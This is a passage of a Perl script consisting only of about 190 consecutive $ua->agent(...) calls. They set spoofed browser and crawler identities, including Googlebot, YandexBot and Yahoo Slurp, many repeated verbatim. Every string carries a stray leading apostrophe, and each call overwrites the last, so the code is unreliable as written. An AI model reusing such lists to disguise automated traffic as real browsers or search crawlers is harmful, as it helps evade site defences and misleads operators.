  5466. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  5467. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  5468. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5469. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  5470. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  5471. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  5472. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  5473. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  5474. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  5475. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5476. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  5477. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  5478. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  5479. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  5480. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5481. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5482. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5483. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5484. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5485. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5486. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5487. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5488. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  5489. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5490. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  5491. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5492. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5493. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5494. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5495. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5496. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5497. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5498. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5499. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5500. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5501. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5502. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5503. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5504. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5505. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5506. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5507. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5508. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5509. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5510. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5511. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5512. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5513. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5514. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5515. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5516. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5517. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5518. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5519. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5520. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5521. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5522. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5523. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5524. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5525. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5526. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5527. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5528. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5529. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5530. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5531. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5532. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5533. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5534. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5535. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5536. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5537. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5538. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5539. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5540. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  5541. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  5542. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  5543. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  5544. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  5545. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  5546. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  5547. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  5548. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  5549. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  5550. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  5551. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  5552. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  5553. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  5554. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  5555. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  5556. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  5557. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  5558. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  5559. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  5560. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5561. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5562. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5563. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5564. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5565. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5566. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5567. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5568. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  5569. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5570. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  5571. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5572. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  5573. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  5574. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  5575. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5576. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  5577. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5578. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5579. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5580. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5581. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5582. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5583. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5584. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5585. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5586. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5587. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5588. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5589. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5590. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5591. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5592. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5593. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5594. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5595. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5596. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5597. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5598. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5599. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5600. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5601. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5602. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5603. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5604. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5605. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5606. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5607. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5608. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5609. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5610. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5611. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5612. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5613. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5614. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5615. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5616. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5617. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5618. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5619. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5620. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5621. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5622. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5623. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5624. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5625. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5626. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5627. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5628. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5629. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5630. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5631. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5632. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5633. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5634. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5635. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5636. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5637. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5638. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5639. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5640. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5641. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5642. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5643. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5644. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5645. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5646. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5647. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5648. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5649. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5650. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5651. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5652. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5653. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5654. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5655. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5656. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5657. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5658. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
